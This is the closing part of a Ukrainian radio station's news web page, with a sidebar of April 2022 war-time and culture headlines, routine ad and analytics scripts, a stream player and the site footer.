<li data-published-date="2022-04-23 09:17:00" class=" photo   ">
<a data-url="/sonyahi-zsu-traktor-ponad-30-patriotichnih-pisanok-yaki-pidkorili-merezhu_n203526" title="" class="ajaxLink" target="_self" href="/sonyahi-zsu-traktor-ponad-30-patriotichnih-pisanok-yaki-pidkorili-merezhu_n203526">
<div class="time">09:17</div>
<div class="news-title">
Соняхи, ЗСУ, трактор: понад 30 патріотичних писанок, які підкорили мережу
</div>
</a>
</li>
<li class="month">
22 квітня
</li>
<li data-published-date="2022-04-22 19:50:00" class=" video   ">
<a data-url="/razom-do-peremogi-ukrayinski-zirki-j-talanoviti-diti-zaspivali-pisnyu-pro-ukrayinu_n203524" title="" class="ajaxLink" target="_self" href="/razom-do-peremogi-ukrayinski-zirki-j-talanoviti-diti-zaspivali-pisnyu-pro-ukrayinu_n203524">
<div class="time">19:50</div>
 <div class="news-title">
Разом до перемоги: українські зірки й талановиті діти заспівали пісню про Україну
</div>
</a>
</li>
<li data-published-date="2022-04-22 17:22:00" class="   ">
<a data-url="/interaktivna-mapa-perejmenovanih-vulic-v-ukrayini-stvorili-derusifikovanu-kartu_n203519" title="" class="ajaxLink" target="_self" href="/interaktivna-mapa-perejmenovanih-vulic-v-ukrayini-stvorili-derusifikovanu-kartu_n203519">
<div class="time">17:22</div>
<div class="news-title">
Інтерактивна мапа перейменованих вулиць: в Україні створили дерусифіковану карту
</div>
</a>
</li>
<li data-published-date="2022-04-22 14:26:00" class=" photo   ">
<a data-url="/polskij-pekar-vipikaye-v-buchi-hlib-i-paski-dlya-ukrayinciv---foto_n203513" title="" class="ajaxLink" target="_self" href="/polskij-pekar-vipikaye-v-buchi-hlib-i-paski-dlya-ukrayinciv---foto_n203513">
<div class="time">14:26</div>
<div class="news-title">
Польський пекар випікає в Бучі хліб і паски для українців – фото
</div>
</a>
</li>
<li data-published-date="2022-04-22 10:52:00" class=" video   ">
<a data-url="/kalush-orchestra-vistupiv-v-irpeni-prosto-neba--video_n203506" title="" class="ajaxLink" target="_self" href="/kalush-orchestra-vistupiv-v-irpeni-prosto-neba--video_n203506">
<div class="time">10:52</div>
<div class="news-title">
 Kalush Orchestra виступив в Ірпені просто неба – відео
</div>
</a>
</li>
<li class="month">
21 квітня
</li>
<li data-published-date="2022-04-21 20:51:00" class="   ">
<a data-url="/zsu-chetvertaarmiyanato-yak-zayaviv-chlen-atlantichnoyi-radi-yurij-romanyuk_n203505" title="" class="ajaxLink" target="_self" href="/zsu-chetvertaarmiyanato-yak-zayaviv-chlen-atlantichnoyi-radi-yurij-romanyuk_n203505">
<div class="time">20:51</div>
<div class="news-title">
ЗСУ – четверта армія НАТО, як заявив член Атлантичної ради Юрій Романюк
</div>
</a>
</li>
<li data-published-date="2022-04-21 17:52:00" class=" video   ">
<a data-url="/cholovik-z-zaliznimi-yajcyamishon-lennon-i-gogol-bordello-zapisali-pisnyu-pro-zelenskogo_n203499" title="" class="ajaxLink" target="_self" href="/cholovik-z-zaliznimi-yajcyamishon-lennon-i-gogol-bordello-zapisali-pisnyu-pro-zelenskogo_n203499">
<div class="time">17:52</div>
<div class="news-title">
Чоловік з залізними яйцями: Шон Леннон і Gogol Bordello записали пісню про Зеленського
</div>
</a>
</li>
<li data-published-date="2022-04-21 16:51:00" class=" photo   ">
<a data-url="/ne-margaritki-ne-gladiolusi-yak-pravilno-nazivati-kviti-ukrayinskoyu_n194064" title="" class="ajaxLink" target="_self" href="/ne-margaritki-ne-gladiolusi-yak-pravilno-nazivati-kviti-ukrayinskoyu_n194064">
<div class="time">16:51</div>
<div class="news-title">
Не маргаритки, не гладіолуси: як правильно називати квіти українською
</div>
</a>
</li>
<li data-published-date="2022-04-21 13:54:00" class=" video   ">
<a data-url="/britanci-florence-and-the-machine-prisvyatili-ukrayini-klip-yakij-znyato-u-kiyevi_n203494" title="" class="ajaxLink" target="_self" href="/britanci-florence-and-the-machine-prisvyatili-ukrayini-klip-yakij-znyato-u-kiyevi_n203494">
<div class="time">13:54</div>
<div class="news-title">
Британці Florence and the Machine присвятили Україні кліп, який знято у Києві
</div>
</a>
</li>
<li data-published-date="2022-04-21 09:53:00" class=" video   ">
<a data-url="/plastichna-specoperaciya-zirka-skazhenogo-vesillya-vismiyala-marchenko-u-novomu-video_n203489" title="" class="ajaxLink" target="_self" href="/plastichna-specoperaciya-zirka-skazhenogo-vesillya-vismiyala-marchenko-u-novomu-video_n203489">
<div class="time">09:53</div>
<div class="news-title">
Пластична спецоперація: зірка &quot;Скаженого весілля&quot; висміяла Марченко у новому відео
</div>
</a>
</li>
<li class="month">
20 квітня
</li>
<li data-published-date="2022-04-20 20:50:00" class="   ">
<a data-url="/u-pcu-rozpovili-yak-osvyachuvati-paski-na-velikden-v-umovah-vijni_n203487" title="" class="ajaxLink" target="_self" href="/u-pcu-rozpovili-yak-osvyachuvati-paski-na-velikden-v-umovah-vijni_n203487">
<div class="time">20:50</div>
<div class="news-title">
У ПЦУ розповіли, як освячувати паски на Великдень в умовах війни
</div>
</a>
</li>
<li data-published-date="2022-04-20 18:21:00" class=" photo   ">
<a data-url="/bizhenciv-z-ukrayini-v-irlandiyi-poselili-v-zamku-xv-stolittya-zvorushlivi-foto_n203483" title="" class="ajaxLink" target="_self" href="/bizhenciv-z-ukrayini-v-irlandiyi-poselili-v-zamku-xv-stolittya-zvorushlivi-foto_n203483">
<div class="time">18:21</div>
<div class="news-title">
Біженців з України в Ірландії поселили в замку XV століття: зворушливі фото
</div>
</a>
</li>
<li data-published-date="2022-04-20 15:19:00" class=" photo  last ">
<a data-url="/internetom-starlink-vid-ilona-maska-dozvolili-koristuvatisya-vsim-bazhayuchim-v-ukrayini_n203474" title="" class="ajaxLink" target="_self" href="/internetom-starlink-vid-ilona-maska-dozvolili-koristuvatisya-vsim-bazhayuchim-v-ukrayini_n203474">
<div class="time">15:19</div>
<div class="news-title">
Інтернетом Starlink від Ілона Маска дозволили користуватися всім охочим в Україні
</div>
</a>
</li>
</ul>
</div>
<button data-limit="25" class="border-button scroll-news-list more-news top">Більше новин
</button>
</div>
</div>
</div>
<div style="margin: 20px 0" id="recommended">
<script async src="https://securepubads.g.doubleclick.net/tag/js/gpt.js"></script>
<script>
    window.googletag = window.googletag || {cmd: []};
    googletag.cmd.push(function () {
        googletag.defineSlot('/56301415/maximum_right_column_more_news', [[1, 1], [300, 250], [300, 600]], 'div-gpt-ad-1640335916932-0').addService(googletag.pubads());
        googletag.pubads().enableSingleRequest();
        googletag.enableServices();
    });
</script>

<div id='div-gpt-ad-1640335916932-0' style='min-width: 300px; min-height: 250px; text-align: center'>
<script>
        googletag.cmd.push(function () {
            googletag.display('div-gpt-ad-1640335916932-0');
        });
    </script>
</div> </div>
</div>
</div>
</div>
<script>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</script>
<div id="mobile-branding">
<div id="mobile-branding-wrapper" style="height: 0">
<div id='div-gpt-ad-1479289268975-0'></div>
</div>
</div>
<script>
    if (window.innerWidth < 640) {
        let headerQuerySelector = 'header';
        // if (document.getElementById('mobileBrandingPlace') === null) {
        //     let mobileBrandingWrapper = document.createElement('div');
        //     mobileBrandingWrapper.id = 'mobileBrandingPlace';
        //     mobileBrandingWrapper.style.zIndex = 9;
        //     document.querySelector(headerQuerySelector).after(mobileBrandingWrapper)
        // }
        window.mobileBrandingConfig = {
            mobileBrandingPlace: '#mobileBrandingPlace',
            headerHeight: 0,
            isHeaderSticky: true,
            headerQuerySelector: headerQuerySelector
        }
        var removeMobileBranding = function () {
            ['mobileBrandingSmall', 'mobileBrandingSmallBannerWrapper'].forEach(item => {
                let branding = document.getElementById(item);
                if (branding && countNews <= 2) {
                    branding.remove();
                }
            });
            const event = document.createEvent('Event');
            event.initEvent('disableSmallMobileBranding', true, true);
            window.dispatchEvent(event);
        }

        initMobileBranding();

        observer('.hide-mobile-adv', removeMobileBranding, 1, false);
    }
</script>
<script src="/assets/js/fotorama.js?v=46"></script>
<script>
                (function () {
    var node = document.createElement("p");
    node.setAttribute("id", "withinNewsTextBanner");

    var contentRollWrapper = document.createElement('div');
    contentRollWrapper.id = 'content-roll-tracker';

    var contentrollPiwikTracker = document.createElement('div');
    contentrollPiwikTracker.id = 'contentroll-piwik-tracker';
    contentRollWrapper.appendChild(contentrollPiwikTracker);

    var adpartnerVunit255 = document.createElement('div');
    adpartnerVunit255.id = 'adpartner-vunit-255';
    contentRollWrapper.appendChild(adpartnerVunit255);

    var adpartnerHtmlunit752 = document.createElement('div');
    adpartnerHtmlunit752.id = 'adpartner-htmlunit-752';
    contentRollWrapper.appendChild(adpartnerHtmlunit752);

    node.appendChild(contentRollWrapper);
    var summary = document.querySelector(".news-content");
    summary.insertBefore(node, summary.childNodes[Math.floor(summary.childNodes.length / 2)]);

})();
$(function () {
    new piwikViewPortTracker({
        url: 'https://piwik.luxnet.ua/piwik.php?idsite=38&rec=1',
        elementId: 'contentroll-piwik-tracker'
    });
});

(function initAds() {
    (function () {
        var head = document.getElementsByTagName('head')[0];
        for (let script of head.getElementsByTagName('script')) {
            if (script.src.includes('//a4p.adpartner.pro/vunit?id=255&')) {
                script.remove();
            }
        }
        var script = document.createElement('script');
        script.type = 'text/javascript';
        script.src = "//a4p.adpartner.pro/vunit?id=255&" + Math.random();
        head.appendChild(script);
    })();

    (function () {
        var head = document.getElementsByTagName('head')[0];
        for (let script of head.getElementsByTagName('script')) {
            if (script.src.includes('//a4p.adpartner.pro/htmlunit?id=752&')) {
                script.remove();
            }
        }
        var script = document.createElement('script');
        script.type = 'text/javascript';
        script.src = "//a4p.adpartner.pro/htmlunit?id=752&" + Math.random();
        head.appendChild(script);
    })();
})();
    </script>
<script>
        
        $(function () {

                        
            getShareCount({
                'newsId': '203564',
                'sharingUrl': 'https://maximum.fm/ne-bilshe-troh-v-odni-ruki-u-velikij-britaniyi-vveli-obmezhennya-na-pevni-tovari_n203564',
                'whatIs': 'news'
            });

        });

    </script>
<script>
        $(function () {
            new ClipboardTextWatermark({
                selector: '.news-content-wrapper',
                prefixText: 'Новини',
                link: 'https://maximum.fm/novini_t2',
                textWatermark: '<br/>https://maximum.fm/novini_t2'
            });
        });

    </script>
<script>
        function initTwentyTwenty(){
            const images = $('.before-after-comparator').find('img');
            $(images).each(function (){
                this.onload = function (){
                    if (this.height > 0){
                        $(function () {
                            $(".before-after-comparator").each(function (){
                                if(!$(this).hasClass('twentytwenty-container')){
                                    $(this).twentytwenty();
                                }
                            })
                        });
                    }
                }
            })
        }
        // this only for reload page
        window.addEventListener('load', function (e) {
            $(".before-after-comparator").each(function (){
                if(!$(this).hasClass('twentytwenty-container')){
                    $(this).twentytwenty();
                }
            })
        })
        // tis work after ajax replace content
        initTwentyTwenty();
    </script>
<script>
        (function () {
            $('#ontheioViewTacking').attr('data-io-article-url', window.location.href);
        })();
    </script>
<script>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</script>
<script src="/assets/js/replaceViewsCount.js?v=46"></script>
<script>
        window.addEventListener('pageshow', function () {
            new replaceViewsCount.Init({
                newsId: '203564',
                parentClass: '.news-content-wrapper',
                elementClass: '.watchers',
                url: '/get-count-views'
            });
        });
    </script>

<script>
        lazyLoadScripts( function () {
            var parentEl = document.getElementsByTagName('body');
            var onTheIoScript = document.createElement('script');
            onTheIoScript.src = "https://cdn.onthe.io/io.js/Hz0HedbhBSNo"
            parentEl[0].appendChild(onTheIoScript);
        }, 1800);
    </script>
<script>
            window._io_config = window._io_config || {};
            window._io_config["0.2.0"] = window._io_config["0.2.0"] || [];
            window._io_config["0.2.0"].push({
                page_url: window.location.href,
                page_url_canonical: "https://maximum.fm/ne-bilshe-troh-v-odni-ruki-u-velikij-britaniyi-vveli-obmezhennya-na-pevni-tovari_n203564",
                page_title: "Не більше трьох в одні руки: у Великій Британії ввели обмеження на певні товари - Радіо Максимум",
                page_type: "article",
                page_language: "uk",
                article_authors: ["Наталія Лейцюсь"],
                article_categories: ["війна"],
                article_type: "Новини",
                article_word_count: "197",
                article_publication_date: "Sun, 24 Apr 2022 12:52:00 +0300"
            });
        </script>

<script src="/assets/js/news.js?v=46"></script>
<script>new news.lazyEmbeds();</script>
</div>
<div class="mobile-320-ad" id="radio24_320x50">
<div id="mobile-320-ad-close">close</div>
<div id='div-gpt-ad-1474010488480-0' style='min-width: 320px; min-height: 50px;'></div>
</div>
<script>
    $('#mobile-320-ad-close').click(function () {
        $('#radio24_320x50').hide();
    });
</script>
<script>
    if( typeof dfpAdSlots === 'undefined'){
        var dfpAdSlots = [];
    }

    lazyLoadScripts(function () {
        if(adCore.isLargerThan(1024)) {
            dfpAdSlots['brandingAdSlot'] = adCore.defineDfpSlot({
                'name': '/56301415/radio24_newBranding',
                'sizes': [1, 1],
                'id': 'div-gpt-ad-1465852635468-0',
                'targeting': [
                    ['pageType', adCore.getPageName()],
                                        ['newsId', '203564'],
                    ['tagId', 'Україна,війна,Росія,Економіка,Великобританія,Суспільство,Їжа,Новини'],
                                    ],
                'refreshEventName': 'historyChange',
                'callback': function(e) {
                    if (typeof Foundation != 'undefined') {
                        new Foundation.Equalizer($('#topNewsEqualiser'));
                    }
                    if (e.isEmpty) {
                        if (adCore.isLargerThan(1279)) {
                            $('body').addClass('branding');
                            adCore.defineDfpSlot({
                                'name': '/56301415/radio24_160x600_sticky_left',
                                'sizes': [[160, 600], [120, 600]],
                                'id': 'div-gpt-ad-1584534586171-0',
                                'targeting': adCore.targeting.getAll(),
                                'callback': function () {}
                            });
                            googletag.cmd.push(function() { googletag.display('div-gpt-ad-1584534586171-0'); });

                            adCore.defineDfpSlot({
                                'name': '/56301415/radio24_160x600_sticky_right',
                                'sizes': [[160, 600], [120, 600]],
                                'id': 'div-gpt-ad-1584534615722-0',
                                'targeting': adCore.targeting.getAll(),
                                'callback': function () {}
                            });
                            googletag.cmd.push(function() { googletag.display('div-gpt-ad-1584534615722-0'); });
                        }
                    } else {
                        dfpAdSlots['brandingAdSlot'] = e.slot;
                    }
                }
            });
        }
    }, 2000);
</script>
<div class="adv-container">
<div class="row">
<div id="branding_wrap" class="bending_wrap"></div>
</div>
</div>
<div id='div-gpt-ad-1465852635468-0'>
<script type='text/javascript'>
        lazyLoadScripts(function () {
            if (adCore.isLargerThan(1024)) {
                googletag.cmd.push(function() { googletag.display('div-gpt-ad-1465852635468-0'); });
            }
        }, 2500);
    </script>
</div>
<div class="adv-container">
<div id="branding-wrapp" class="branding-wrapp">
<div class="google-left-img">
<div id="google-left-bg-image" style="width: 160px; height: 600px; position: fixed;">

<div id='div-gpt-ad-1584534586171-0'>
</div>
</div>
</div>
<div class="google-right-img">
<div id="google-right-bg-image" style="width: 160px; height: 600px; position: fixed;">

<div id='div-gpt-ad-1584534615722-0'>
</div>
</div>
</div>
</div>
</div>

<script src="/assets/js/lazyLoad.js?v=46"></script>
<script>new lazyLoad.Init();</script>
<script src="/assets/js/application.js?v=46"></script>
<script>
    $('.play-btn').mousedown(function () {
        let playerBtn = $(this);
        if (false === playerBtn.hasClass('play-clicked')) {
            loadPlayer();
            playerBtn.addClass('play-clicked');
        }
    });

    function loadPlayer() {
        application.cssSrc('/assets/css/videojs/videojs.min.css?v=46');
        var player = window.player = videojs('audio-player');
        application.scriptSrc('/assets/js/player.min.js?v=46');
    }
</script>
<script>
    document.addEventListener("DOMContentLoaded", function (){
        const node = document.getElementById('news-list-wrapper');
        if(node){
            const isMainPage = parseInt(node.getAttribute('data-main'));
            if (isMainPage !== 1 ) {
                if (window.innerWidth > 640){
                    application.initTabAndPagination('/get-more-last-news', '/get-more-important-news');
                }
            } else {
                application.initTabAndPagination('/get-more-last-news', '/get-more-important-news');
            }
        }
    });
</script>
<footer>
<div class="footer-content">
<div class="row">
<div class="logo-wrapper columns small-12 medium-6">
<a href="/" class="main-logo ajaxLink" data-url="/"></a>
<div class="slogan">Від легендарних до сьогодні! МАКСИМУМ хітів на Радіо МАКСИМУМ</div>
<div class="copyrights">
При цитуванні і використанні будь-яких матеріалів в Інтернеті відкриті для пошукових систем
гіперпосилання не нижче першого абзацу на «Радіо Максимум» — обов’язкові.
Цитування і використання матеріалів у оффлайн-медіа, Мобільних додатках, SmartTV можливе лише з
письмової згоди «Радіо Максимум».
Матеріали з маркуванням «Реклама» публікуються на правах реклами.
Усі права захищені. © 2005—2022, ПрАТ «Телерадіокомпанія “Люкс”», «Радіо Максимум»
</div>
</div>
<div class=" columns small-12 medium-5">
<ul class="social">
<li class="social-button"><a href="//www.facebook.com/maximumfmua" class="facebook" target="_blank"></a></li>
<li class="social-button"><a href="//twitter.com/maximumfm_ua" class="twitter" target="_blank"></a></li>
<li class="social-button"><a href="/rssAll.xml" class="rss" target="_blank"></a></li>
<li class="social-button"><a href="//itunes.apple.com/ua/app/radio-24/id797596046?mt=8" class="appstore" target="_blank"></a></li>
<li class="social-button"><a href="//play.google.com/store/apps/details?id=com.radio24.ua" class="playmarket" target="_blank"></a></li>
</ul>
<ul class="links">
<li title="Архів">
<a class="ajaxLink" data-url="/archive" title="Архів" href="/archive">Архів</a>
</li>
<li>
<a href="/contacts#ownership-structure">Структура власності</a>
</li>
<li title="Контакти">
<a class="ajaxLink" data-url="/contacts" title="Контакти" href="/contacts">Контакти</a>
</li>
<li title="Політика користування сайтом">
<a class="ajaxLink" data-url="/rules" title="Політика користування сайтом" href="/rules">Політика користування сайтом</a>
</li>
<li title="Ведучі">
<a class="ajaxLink" data-url="/staff" title="Ведучі" href="/staff">Ведучі</a>
</li>
<li>
<a href="//maximum.fm/uploads/maximum.m3u">Завантажити для плеєра</a>
</li>
<li title="Карта покриття">
<a class="ajaxLink" data-url="/radiocovermap" title="Карта покриття" href="/radiocovermap">Карта покриття</a>
</li>
<li title="Політика конфіденційності">
<a class="ajaxLink" data-url="/copyrights" title="Політика конфіденційності" href="/copyrights">Політика конфіденційності</a>
</li>
</ul>
</div>
</div>
</div>
</footer>
<script>
    function desktopNewsCatfishInit() {
        if (adCore.isLargerThan(1023)) {
            adCore.defineDfpSlot({
                'name': '/56301415/maximum_desktop_catfish',
                'sizes': [[1, 1], [970, 90]],
                'id': 'div-gpt-ad-1638533775236-0',
                'targeting': adCore.targeting.getAll(),
                'refreshEventName': 'historyChange',
                'callback': function (e) {
                    var marketGrid = document.getElementById('market-grid');
                    if (!e.isEmpty) {
                        marketGrid.style.display = 'flex';

                        if (e.size[0] === 1 && e.size[1] === 1) {
                            let iFrame = marketGrid.getElementsByTagName("iframe")[0];
                            if (iFrame) {
                                iFrame.width = '990';
                                iFrame.height = '182';
                            }
                        }
                    } else {
                        marketGrid.style.display = 'none';
                    }
                }
            });
        }
    }

    desktopNewsCatfishInit();
</script>
<div id="market-grid" style="display: none;" class="market-grid">
<div id='div-gpt-ad-1638533775236-0' style='min-width: 970px; min-height: 90px;'>
<script>
            lazyLoadScripts(function () {
                if (adCore.isLargerThan(1023)) {
                    googletag.cmd.push(function () {
                        googletag.display('div-gpt-ad-1638533775236-0');
                    });
                }
            }, 1500)
        </script>
</div>
<button class="close close-cat-fish"></button>
</div>
<script>
    $('.close-cat-fish').click(function () {
        $('#market-grid').remove();
    });
</script>
<div class="player-wrapper" style="overflow: hidden; opacity: 0 !important; height: 0; position: absolute; z-index: -1;">
<video id="audio-player" preload="auto" class="video-js vjs-default-skin" playsinline data-setup='{}' controls>
<source src="https://streamvideo.luxnet.ua/maximum/smil:maximum.stream.smil/playlist.m3u8" type="application/x-mpegURL" />
</video>
</div>
<script>
        lazyLoadScripts(function () {
            $(document).ready(function () {
                $('.expand-stations-wrapper').click(function () {
                    var stations = $('.stations-wrapper-header-block');

                    var isHidden = !stations.hasClass('full-view');
                    if (typeof getCookie("isStationsOpen") !== "undefined") {
                        setCookie("isStationsOpen", isHidden, {'expires': 60 * 60 * 24 * 365, 'path': '/'})
                    } else {
                        deleteCookie("isStationsOpen");
                        setCookie("isStationsOpen", isHidden, {'expires': 60 * 60 * 24 * 365, 'path': '/'})
                    }
                });
            });
        }, 2000);

        function deleteCookie(name) {
            setCookie(name, "", {
                expires: -1
            })
        }

        function getCookie(name) {
            var matches = document.cookie.match(new RegExp(
                "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
            ));
            return matches ? decodeURIComponent(matches[1]) : undefined;
        }

        function setCookie(name, value, options) {
            options = options || {};

            var expires = options.expires;

            if (typeof expires === "number" && expires) {
                var d = new Date();
                d.setTime(d.getTime() + expires * 1000);
                expires = options.expires = d;
            }
            if (expires && expires.toUTCString) {
                options.expires = expires.toUTCString();
            }

            value = encodeURIComponent(value);

            var updatedCookie = name + "=" + value;

            for (var propName in options) {
                updatedCookie += "; " + propName;
                var propValue = options[propName];
                if (propValue !== true) {
                    updatedCookie += "=" + propValue;
                }
            }

            document.cookie = updatedCookie;
        }
    </script>
<script>
        lazyLoadScripts(function () {
            (function () {
                if (typeof window.CustomEvent === "function") return false; //If not IE

                function CustomEvent(event, params) {
                    params = params || {bubbles: false, cancelable: false, detail: undefined};
                    var evt = document.createEvent('CustomEvent');
                    evt.initCustomEvent(event, params.bubbles, params.cancelable, params.detail);
                    return evt;
                }

                CustomEvent.prototype = window.Event.prototype;

                window.CustomEvent = CustomEvent;
            })();
        }, 2000);
    </script>
<script>
        lazyLoadScripts( function () {
            var parentEl = document.getElementsByTagName('body');
            var libScript = document.createElement('script');
            libScript.src = "https://imasdk.googleapis.com/js/sdkloader/ima3.js"
            parentEl[0].appendChild(libScript);
        }, 1500);
    </script>
<script src="/assets/js/lib.min.js?v=46"></script>
<script src="/assets/js/news.js?v=46"></script>
<script>
        new news.getMoreNews({
            url: '/get-more-video-news',
            loadBtn: $('.load-more-news'),
        })
    </script>
<script src="/assets/js/app.min.js?v=46"></script>
<script>
    function getAllStream() {
                    var stream = {
                type: 'application/x-mpegURL',
                src: 'https://streamvideo.luxnet.ua/maximum/smil:maximum.stream.smil/playlist.m3u8'
            };
            streamConfig.addStream('onair', stream);
                streamConfig.onAirId = 4;
        streamConfig.onAirName = 'onair';
    }

    function getPrerollLink() {
        player.adTagLink = 'https\u003A\/\/inv\u002Dnets.admixer.net\/daast.aspx\u003Fzone\u003D1ba30f9d\u002Dfe35\u002D415f\u002Da6b5\u002D7077a40865ad\u0026rnd\u003D\u0025\u0025CACHEBUSTER\u0025\u0025\u0026page\u003D\u0025\u0025REFERRER_URL_ESC\u0025\u0025';
    }
</script>
<script src="/assets/js/websocket.js?v=46"></script>
<script>
        new websocket.Init({
            cdnHost: 'https://imagecdn3.luxnet.ua/music/web',
            wsHost: 'wss://maximum.fm/get-station-ws',
            headerSongLimit: 3,
            stationSongListLimit: 15
        });
    </script>
<script type="text/javascript">
        lazyLoadScripts(function () {
            $.smartbanner({
                title: ' ',
                author: 'Безкоштовно',
                inAppStore: 'Встановлюй на iOS', // Text of price for iOS
                inGooglePlay: 'Встановлюй на Android', // Text of price for Android
                price: ' ',
                button: 'Встановити'
            })
        }, 60000);
    </script>
<script type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "Organization",
        "name": "Радіо Максимум",
        "foundingDate": "2017-10-03",
        "url": "https://maximum.fm/",
        "sameAs": [
            "https://maximum.fm/",
            "https://uk.wikipedia.org/wiki/%D0%A0%D0%B0%D0%B4%D1%96%D0%BE_%D0%9C%D0%B0%D0%BA%D1%81%D0%B8%D0%BC%D1%83%D0%BC",
            "https://www.facebook.com/maximumfmua",
            "https://twitter.com/maximumfm_ua",
            "https://apps.apple.com/ua/app/radio-24/id797596046",
            "https://play.google.com/store/apps/details?id=com.radio24.ua"
        ],
        "logo": {
            "@type": "ImageObject",
            "url": "https://maximum.fm/assets/images/favicons/favicon-64x64.png"
        },
        "address": {
            "@type": "PostalAddress",
            "streetAddress": "Київ, вул. Володимирська 61/11, офіс 44",
            "addressLocality": "Київ",
            "addressCountry": "UA"
        }
    }
</script> <script>
        //Commented. task https://jira.luxnet.ua/browse/MAXIMUM-1960
        // if(window.innerWidth > 640){
        //     $.ajax({
        //         type: "GET",
        //         url: "https://a4p.adpartner.pro/media?site_id=9&unit_id=242",
        //         dataType: "script"
        //     });
        // }
    </script>
<script>
        lazyLoadScripts( function () {
            var parentEl = document.getElementsByTagName('body');
            var gravitecScript = document.createElement('script');
            gravitecScript.src = "https://webvitals.luxnet.ua/js/bundle.js"
            gravitecScript.async
            parentEl[0].appendChild(gravitecScript);
        }, 2500);
    </script>

<div class="toTop">
<div id="toTop">
<img class="toTop-img" src="/assets/images/to_top.png?v=46" style="width: 50px; height: 50px" alt="To top icon">
</div>
</div>
<script>
    $(function() {
        $(window).scroll(function() {
            if($(this).scrollTop() != 0) {
                $('#toTop').fadeIn();
            } else {
                $('#toTop').fadeOut();
            }
        });

        $('#toTop').click(function() {
            $('body,html').animate({scrollTop:0},300);
        });
    });
</script> 
</body>
</html>
